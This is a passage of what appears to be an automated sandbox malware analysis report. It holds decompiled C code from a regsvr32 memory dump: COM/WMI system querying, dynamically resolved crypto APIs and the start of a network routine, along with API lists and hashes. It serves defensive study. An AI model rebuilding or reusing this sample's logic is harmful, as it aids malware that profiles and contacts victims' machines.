                                                                                                                                                                                              				signed int _v60;
                                                                                                                                                                                              				char* _v72;
                                                                                                                                                                                              				signed short _v80;
                                                                                                                                                                                              				signed int _v84;
                                                                                                                                                                                              				char _v88;
                                                                                                                                                                                              				char _v92;
                                                                                                                                                                                              				char _v96;
                                                                                                                                                                                              				intOrPtr _v100;
                                                                                                                                                                                              				char _v104;
                                                                                                                                                                                              				char _v616;
                                                                                                                                                                                              				intOrPtr* _t159;
                                                                                                                                                                                              				char _t165;
                                                                                                                                                                                              				signed int _t166;
                                                                                                                                                                                              				signed int _t173;
                                                                                                                                                                                              				signed int _t178;
                                                                                                                                                                                              				signed int _t186;
                                                                                                                                                                                              				intOrPtr* _t187;
                                                                                                                                                                                              				signed int _t188;
                                                                                                                                                                                              				signed int _t192;
                                                                                                                                                                                              				intOrPtr* _t193;
                                                                                                                                                                                              				intOrPtr _t200;
                                                                                                                                                                                              				intOrPtr* _t205;
                                                                                                                                                                                              				signed int _t207;
                                                                                                                                                                                              				signed int _t209;
                                                                                                                                                                                              				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E04AFE400(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E04AF8BDE(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E04AF8BF4( &_v60, 0xfffffffe);
					E04AFE4B4( &_v104);
					return _t320;
				}
				_t165 = E04AF9DF2(_t255, 0x3a7);
				 *_t328 = 0xae7;
				_v52 = _t165;
				_t166 = E04AF9DF2(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E04AF9A5A(_t165);
				_v60 = _t322;
				E04AF8BAF( &_v52);
				E04AF8BAF( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E04AF9DF2(_t255, 0x886);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E04AF8BAF( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E04AF8BF4( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E04AF98BD(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E04AF98BD(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E04AF8C72(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E04AF8BDE( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E04AF8BF4(_t136, 0);
								E04AF8BF4( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E04AF98BD(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
                                                                                                                                                                                              								__eflags = _t214;
                                                                                                                                                                                              								if(_t214 < 0) {
                                                                                                                                                                                              									L39:
                                                                                                                                                                                              									__imp__#6(_v44);
                                                                                                                                                                                              									_t207 = _v12 + 1;
                                                                                                                                                                                              									__eflags = _t207;
                                                                                                                                                                                              									continue;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_v92 = E04AF9DF2(_t281, 0xb28);
                                                                                                                                                                                              								 *_t329 = 0x83f;
                                                                                                                                                                                              								_t217 = E04AF9DF2(_t281);
                                                                                                                                                                                              								_t283 = _v80;
                                                                                                                                                                                              								_v96 = _t217;
                                                                                                                                                                                              								_t218 = _t283 & 0x0000ffff;
                                                                                                                                                                                              								__eflags = _t218 - 0xb;
                                                                                                                                                                                              								if(__eflags > 0) {
                                                                                                                                                                                              									_t219 = _t218 - 0x10;
                                                                                                                                                                                              									__eflags = _t219;
                                                                                                                                                                                              									if(_t219 == 0) {
                                                                                                                                                                                              										L35:
                                                                                                                                                                                              										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E04AF8BDE(0x18);
                                                                                                                                                                                              										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                                                                                                                                              										__eflags = _t289;
                                                                                                                                                                                              										if(_t289 == 0) {
                                                                                                                                                                                              											L38:
                                                                                                                                                                                              											E04AF8BAF( &_v92);
                                                                                                                                                                                              											E04AF8BAF( &_v96);
                                                                                                                                                                                              											__imp__#9( &_v80);
                                                                                                                                                                                              											goto L39;
                                                                                                                                                                                              										}
                                                                                                                                                                                              										_push(_v72);
                                                                                                                                                                                              										_push(L"%d");
                                                                                                                                                                                              										L37:
                                                                                                                                                                                              										_push(0xc);
                                                                                                                                                                                              										_push(_t289);
                                                                                                                                                                                              										E04AF9E51();
                                                                                                                                                                                              										_t329 = _t329 + 0x10;
                                                                                                                                                                                              										goto L38;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t230 = _t219 - 1;
                                                                                                                                                                                              									__eflags = _t230;
                                                                                                                                                                                              									if(_t230 == 0) {
                                                                                                                                                                                              										L33:
                                                                                                                                                                                              										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E04AF8BDE(0x18);
                                                                                                                                                                                              										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                                                                                                                                              										__eflags = _t289;
                                                                                                                                                                                              										if(_t289 == 0) {
                                                                                                                                                                                              											goto L38;
                                                                                                                                                                                              										}
                                                                                                                                                                                              										_push(_v72);
                                                                                                                                                                                              										_push(L"%u");
                                                                                                                                                                                              										goto L37;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t235 = _t230 - 1;
                                                                                                                                                                                              									__eflags = _t235;
                                                                                                                                                                                              									if(_t235 == 0) {
                                                                                                                                                                                              										goto L33;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									__eflags = _t235 == 1;
                                                                                                                                                                                              									if(_t235 == 1) {
                                                                                                                                                                                              										goto L33;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									L28:
                                                                                                                                                                                              									__eflags = _t283 & 0x00002000;
                                                                                                                                                                                              									if((_t283 & 0x00002000) == 0) {
                                                                                                                                                                                              										_v88 = E04AF9DF2(_t283, 0xe0a);
                                                                                                                                                                                              										E04AF9E51( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
                                                                                                                                                                                              										E04AF8BAF( &_v88);
                                                                                                                                                                                              										_t329 = _t329 + 0x18;
                                                                                                                                                                                              										_t298 =  &_v616;
                                                                                                                                                                                              										L31:
                                                                                                                                                                                              										_t242 = E04AF98BD(_t298);
                                                                                                                                                                                              										L32:
                                                                                                                                                                                              										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
                                                                                                                                                                                              										goto L38;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t242 = E04AFE92E( &_v80);
                                                                                                                                                                                              									goto L32;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								if(__eflags == 0) {
                                                                                                                                                                                              									__eflags = _v72 - 0xffff;
                                                                                                                                                                                              									_t298 = L"TRUE";
                                                                                                                                                                                              									if(_v72 != 0xffff) {
                                                                                                                                                                                              										_t298 = L"FALSE";
                                                                                                                                                                                              									}
                                                                                                                                                                                              									goto L31;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t243 = _t218 - 1;
                                                                                                                                                                                              								__eflags = _t243;
                                                                                                                                                                                              								if(_t243 == 0) {
                                                                                                                                                                                              									goto L38;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t244 = _t243 - 1;
                                                                                                                                                                                              								__eflags = _t244;
                                                                                                                                                                                              								if(_t244 == 0) {
                                                                                                                                                                                              									goto L35;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t245 = _t244 - 1;
                                                                                                                                                                                              								__eflags = _t245;
                                                                                                                                                                                              								if(_t245 == 0) {
                                                                                                                                                                                              									goto L35;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								__eflags = _t245 != 5;
                                                                                                                                                                                              								if(_t245 != 5) {
                                                                                                                                                                                              									goto L28;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t298 = _v72;
                                                                                                                                                                                              								goto L31;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							__imp__#16(_v24);
                                                                                                                                                                                              							_t210 = _v28;
                                                                                                                                                                                              							 *((intOrPtr*)( *_t210 + 8))(_t210);
                                                                                                                                                                                              							_t252 = _v20;
                                                                                                                                                                                              							L42:
                                                                                                                                                                                              							_t262 = _v32;
                                                                                                                                                                                              							_t252 = _t252 + 1;
                                                                                                                                                                                              							_v20 = _t252;
                                                                                                                                                                                              							__eflags = _t262;
                                                                                                                                                                                              							if(_t262 != 0) {
                                                                                                                                                                                              								continue;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							L48:
                                                                                                                                                                                              							_t324 = _v40;
                                                                                                                                                                                              							goto L49;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t247 = _v28;
                                                                                                                                                                                              						 *((intOrPtr*)( *_t247 + 8))(_t247);
                                                                                                                                                                                              						goto L42;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t262 = _v32;
                                                                                                                                                                                              					goto L48;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					E04AF8BF4( &_v36, _t322);
                                                                                                                                                                                              					_t320 = _v36;
                                                                                                                                                                                              					goto L53;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}

                                                                                                                                                                                              0x04afea84
                                                                                                                                                                                              0x04afea87
                                                                                                                                                                                              0x04afee9f
                                                                                                                                                                                              0x04afeea5
                                                                                                                                                                                              0x04afeeaf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afeeb4
                                                                                                                                                                                              0x04afea92
                                                                                                                                                                                              0x04afea99
                                                                                                                                                                                              0x04afeaa0
                                                                                                                                                                                              0x04afeaa3
                                                                                                                                                                                              0x04afeaa8
                                                                                                                                                                                              0x04afeaaa
                                                                                                                                                                                              0x04afeaad
                                                                                                                                                                                              0x04afeab0
                                                                                                                                                                                              0x04afeab1
                                                                                                                                                                                              0x04afeaba
                                                                                                                                                                                              0x04afeac0
                                                                                                                                                                                              0x04afeac3
                                                                                                                                                                                              0x04afeacc
                                                                                                                                                                                              0x04afead1
                                                                                                                                                                                              0x04afead6
                                                                                                                                                                                              0x04afeaed
                                                                                                                                                                                              0x04afeafa
                                                                                                                                                                                              0x04afeafd
                                                                                                                                                                                              0x04afeb04
                                                                                                                                                                                              0x04afeb09
                                                                                                                                                                                              0x04afeb10
                                                                                                                                                                                              0x04afeb15
                                                                                                                                                                                              0x04afeb1c
                                                                                                                                                                                              0x04afeb1e
                                                                                                                                                                                              0x04afeb2a
                                                                                                                                                                                              0x04afeb2d
                                                                                                                                                                                              0x04afeb2f
                                                                                                                                                                                              0x04afee8f
                                                                                                                                                                                              0x04afee90
                                                                                                                                                                                              0x04afee99
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afee99
                                                                                                                                                                                              0x04afeb35
                                                                                                                                                                                              0x04afeb38
                                                                                                                                                                                              0x04afeb3b
                                                                                                                                                                                              0x04afeb3e
                                                                                                                                                                                              0x04afeb40
                                                                                                                                                                                              0x04afee5b
                                                                                                                                                                                              0x04afee5e
                                                                                                                                                                                              0x04afee61
                                                                                                                                                                                              0x04afee63
                                                                                                                                                                                              0x04afee85
                                                                                                                                                                                              0x04afee8a
                                                                                                                                                                                              0x04afee65
                                                                                                                                                                                              0x04afee68
                                                                                                                                                                                              0x04afee73
                                                                                                                                                                                              0x04afee7a
                                                                                                                                                                                              0x04afee7a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afeb46
                                                                                                                                                                                              0x04afeb46
                                                                                                                                                                                              0x04afeb58
                                                                                                                                                                                              0x04afeb5b
                                                                                                                                                                                              0x04afeb5d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afeb65
                                                                                                                                                                                              0x04afeb68
                                                                                                                                                                                              0x04afeb6b
                                                                                                                                                                                              0x04afeb6e
                                                                                                                                                                                              0x04afeb71
                                                                                                                                                                                              0x04afeb74
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afeb7a
                                                                                                                                                                                              0x04afeb88
                                                                                                                                                                                              0x04afeb8b
                                                                                                                                                                                              0x04afeb8d
                                                                                                                                                                                              0x04afeba6
                                                                                                                                                                                              0x04afebb5
                                                                                                                                                                                              0x04afebbd
                                                                                                                                                                                              0x04afebbd
                                                                                                                                                                                              0x04afebc0
                                                                                                                                                                                              0x04afebc7
                                                                                                                                                                                              0x04afebcb
                                                                                                                                                                                              0x04afebd1
                                                                                                                                                                                              0x04afebd3
                                                                                                                                                                                              0x04afee43
                                                                                                                                                                                              0x04afee49
                                                                                                                                                                                              0x04afee4f
                                                                                                                                                                                              0x04afee52
                                                                                                                                                                                              0x04afee52
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afee52
                                                                                                                                                                                              0x04afebe2
                                                                                                                                                                                              0x04afebf6
                                                                                                                                                                                              0x04afebfa
                                                                                                                                                                                              0x04afebfc
                                                                                                                                                                                              0x04afec01
                                                                                                                                                                                              0x04afee10
                                                                                                                                                                                              0x04afee16
                                                                                                                                                                                              0x04afee21
                                                                                                                                                                                              0x04afee2c
                                                                                                                                                                                              0x04afee32
                                                                                                                                                                                              0x04afee38
                                                                                                                                                                                              0x04afee3b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afee3b
                                                                                                                                                                                              0x04afec07
                                                                                                                                                                                              0x04afedde
                                                                                                                                                                                              0x04afedde
                                                                                                                                                                                              0x04afede1
                                                                                                                                                                                              0x04afede4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afec0f
                                                                                                                                                                                              0x04afec17
                                                                                                                                                                                              0x04afec1e
                                                                                                                                                                                              0x04afec24
                                                                                                                                                                                              0x04afec26
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afec2f
                                                                                                                                                                                              0x04afec44
                                                                                                                                                                                              0x04afec4a
                                                                                                                                                                                              0x04afec53
                                                                                                                                                                                              0x04afec56
                                                                                                                                                                                              0x04afec59
                                                                                                                                                                                              0x04afec5b
                                                                                                                                                                                              0x04afedd1
                                                                                                                                                                                              0x04afedd4
                                                                                                                                                                                              0x04afeddd
                                                                                                                                                                                              0x04afeddd
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afeddd
                                                                                                                                                                                              0x04afec6b
                                                                                                                                                                                              0x04afec6e
                                                                                                                                                                                              0x04afec75
                                                                                                                                                                                              0x04afec7b
                                                                                                                                                                                              0x04afec7e

                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 04AFE400: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,04AFE731,000009DA,00000000,?,00000000), ref: 04AFE413
                                                                                                                                                                                                • Part of subcall function 04AFE400: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,04AFE731,000009DA,00000000,?,00000000), ref: 04AFE424
                                                                                                                                                                                                • Part of subcall function 04AFE400: CoCreateInstance.OLE32(04B0C868,00000000,00000001,04B0C878,?,?,04AFE731,000009DA,00000000,?,00000000), ref: 04AFE43B
                                                                                                                                                                                                • Part of subcall function 04AFE400: SysAllocString.OLEAUT32(00000000), ref: 04AFE446
                                                                                                                                                                                                • Part of subcall function 04AFE400: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,04AFE731,000009DA,00000000,?,00000000), ref: 04AFE471
                                                                                                                                                                                                • Part of subcall function 04AF8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,04AF959D,00000100,?,04AF6507), ref: 04AF8BEC
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 04AFEAF3
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 04AFEB07
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 04AFEE90
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 04AFEE99
                                                                                                                                                                                                • Part of subcall function 04AF8BF4: HeapFree.KERNEL32(00000000,00000000), ref: 04AF8C3A
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                                                                                                                                                                                              • String ID: FALSE$TRUE
                                                                                                                                                                                              • API String ID: 1290676130-1412513891
                                                                                                                                                                                              • Opcode ID: 1fe39f7527a51b50b629b962cfcdf10edffbf08f7a9ed25c5f9ebd39fd81df9e
                                                                                                                                                                                              • Instruction ID: 416dc8e1c255ecfe2fa2a5e848d808c4abb296de70a8599c8457e4339459f938
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fe39f7527a51b50b629b962cfcdf10edffbf08f7a9ed25c5f9ebd39fd81df9e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 14E13CB1E00219AFDB14EFE8CD84AAEBBB9FF48305F148459F605A7294DB74B941CB50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 30%
                                                                                                                                                                                              			E04B028F0(intOrPtr* _a4) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				_Unknown_base(*)()* _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				_Unknown_base(*)()* _t15;
                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                              				intOrPtr* _t25;
                                                                                                                                                                                              				intOrPtr* _t29;
                                                                                                                                                                                              				struct HINSTANCE__* _t30;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                              				_t30 = GetModuleHandleW(L"advapi32.dll");
                                                                                                                                                                                              				if(_t30 == 0) {
                                                                                                                                                                                              					L7:
                                                                                                                                                                                              					return 1;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t25 = GetProcAddress(_t30, "CryptAcquireContextA");
                                                                                                                                                                                              				if(_t25 == 0) {
                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t15 = GetProcAddress(_t30, "CryptGenRandom");
                                                                                                                                                                                              				_v12 = _t15;
                                                                                                                                                                                              				if(_t15 == 0) {
                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t29 = GetProcAddress(_t30, "CryptReleaseContext");
                                                                                                                                                                                              				if(_t29 == 0) {
                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_push(0xf0000000);
                                                                                                                                                                                              				_push(1);
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_push( &_v8);
                                                                                                                                                                                              				if( *_t25() == 0) {
                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t20 = _v12(_v8, 4,  &_v16);
                                                                                                                                                                                              				 *_t29(_v8, 0);
                                                                                                                                                                                              				if(_t20 == 0) {
                                                                                                                                                                                              					goto L7;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				 *_a4 = E04B0284B( &_v16);
                                                                                                                                                                                              				return 0;
                                                                                                                                                                                              			}












                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(advapi32.dll,00000000,00000000,00000000,04AF7B6A), ref: 04B02902
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 04B0291A
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 04B02928
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 04B02937
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                                                                              • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                              • API String ID: 667068680-129414566
                                                                                                                                                                                              • Opcode ID: 2ac241363b9f962f730f357035d4177f3b977451b5ca7a2922c64a767b1eaac3
                                                                                                                                                                                              • Instruction ID: 55c64431f907ec791a7556ee706a077516eefd3222c3185b7929c9fb00587e38
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ac241363b9f962f730f357035d4177f3b977451b5ca7a2922c64a767b1eaac3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 09118272A4030A77DB2196B49C49F9EBAACDF54B52F1541F1E600F31D0EA70FE098AA4
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                              			E04AFF7A6(void* __edx, intOrPtr _a4, intOrPtr _a8, signed int* _a12, signed int* _a16, signed int* _a20, signed int _a24) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                                                              				int _v32;
                                                                                                                                                                                              				signed int _v36;
                                                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                                                              				intOrPtr _v44;
                                                                                                                                                                                              				intOrPtr _v48;
                                                                                                                                                                                              				intOrPtr _v52;
                                                                                                                                                                                              				char _v56;
                                                                                                                                                                                              				int _v68;
                                                                                                                                                                                              				void* _v72;
                                                                                                                                                                                              				intOrPtr _v92;
                                                                                                                                                                                              				int _v96;
                                                                                                                                                                                              				void* _v100;
                                                                                                                                                                                              				intOrPtr _v104;
                                                                                                                                                                                              				intOrPtr _v108;
                                                                                                                                                                                              				char* _v112;
                                                                                                                                                                                              				char _v116;
                                                                                                                                                                                              				char _v132;
                                                                                                                                                                                              				void _v388;
                                                                                                                                                                                              				void _v644;
                                                                                                                                                                                              				intOrPtr _t94;
                                                                                                                                                                                              				intOrPtr _t102;
                                                                                                                                                                                              				signed int _t104;
                                                                                                                                                                                              				intOrPtr* _t105;
                                                                                                                                                                                              				intOrPtr _t110;
                                                                                                                                                                                              				signed int _t111;
                                                                                                                                                                                              				signed int _t112;
                                                                                                                                                                                              				intOrPtr _t115;
                                                                                                                                                                                              				signed int _t116;
                                                                                                                                                                                              				char _t117;
                                                                                                                                                                                              				intOrPtr _t119;
                                                                                                                                                                                              				char _t122;
                                                                                                                                                                                              				intOrPtr _t127;
                                                                                                                                                                                              				signed int _t129;
                                                                                                                                                                                              				intOrPtr _t135;
                                                                                                                                                                                              				intOrPtr _t139;
                                                                                                                                                                                              				intOrPtr _t143;
                                                                                                                                                                                              				intOrPtr _t145;
                                                                                                                                                                                              				intOrPtr _t147;
                                                                                                                                                                                              				intOrPtr _t153;
                                                                                                                                                                                              				intOrPtr _t155;
                                                                                                                                                                                              				intOrPtr _t159;
                                                                                                                                                                                              				void* _t163;
                                                                                                                                                                                              				signed int _t165;
                                                                                                                                                                                              				intOrPtr _t179;
                                                                                                                                                                                              				signed int _t186;
                                                                                                                                                                                              				char _t188;
                                                                                                                                                                                              				signed int _t189;
                                                                                                                                                                                              				void* _t190;
                                                                                                                                                                                              				char _t193;
                                                                                                                                                                                              				signed int _t194;
                                                                                                                                                                                              				signed int _t195;
                                                                                                                                                                                              				void* _t196;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v24 = 4;
                                                                                                                                                                                              				_v32 = 0;
                                                                                                                                                                                              				_v28 = 1;
                                                                                                                                                                                              				_t190 = __edx;
                                                                                                                                                                                              				memset( &_v388, 0, 0x100);
                                                                                                                                                                                              				memset( &_v644, 0, 0x100);
                                                                                                                                                                                              				_v56 = E04AF9DD8(0xd62);
                                                                                                                                                                                              				_v52 = E04AF9DD8(0x8e9);
                                                                                                                                                                                              				_v48 = E04AF9DD8(0xa93);
                                                                                                                                                                                              				_v44 = E04AF9DD8(0x9a9);
                                                                                                                                                                                              				_t94 = E04AF9DD8(0xb64);
                                                                                                                                                                                              				_v36 = _v36 & 0;
                                                                                                                                                                                              				_t188 = 0x3c;
                                                                                                                                                                                              				_v40 = _t94;
                                                                                                                                                                                              				E04AF8D6D( &_v116, 0, 0x100);
                                                                                                                                                                                              				_v108 = 0x10;
                                                                                                                                                                                              				_v112 =  &_v132;
                                                                                                                                                                                              				_v116 = _t188;
                                                                                                                                                                                              				_v100 =  &_v388;
                                                                                                                                                                                              				_v96 = 0x100;
                                                                                                                                                                                              				_v72 =  &_v644;
                                                                                                                                                                                              				_push( &_v116);
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_v68 = 0x100;
                                                                                                                                                                                              				_push(E04AFA43D(_t190));
                                                                                                                                                                                              				_t102 =  *0x4b0f838; // 0x0
                                                                                                                                                                                              				_push(_t190);
                                                                                                                                                                                              				if( *((intOrPtr*)(_t102 + 0x28))() != 0) {
                                                                                                                                                                                              					_t104 = 0;
                                                                                                                                                                                              					__eflags = 0;
                                                                                                                                                                                              					_v12 = 0;
                                                                                                                                                                                              					do {
                                                                                                                                                                                              						_t105 =  *0x4b0f838; // 0x0
                                                                                                                                                                                              						_v8 = 0x8404f700;
                                                                                                                                                                                              						_t189 =  *_t105( *0x4b0f920,  *((intOrPtr*)(_t196 + _t104 * 4 - 0x1c)), 0, 0, 0);
                                                                                                                                                                                              						__eflags = _t189;
                                                                                                                                                                                              						if(_t189 != 0) {
                                                                                                                                                                                              							E04AFF73E(_t189);
                                                                                                                                                                                              							_t110 =  *0x4b0f838; // 0x0
                                                                                                                                                                                              							_t111 =  *((intOrPtr*)(_t110 + 0x1c))(_t189,  &_v388, _v92, 0, 0, 3, 0, 0);
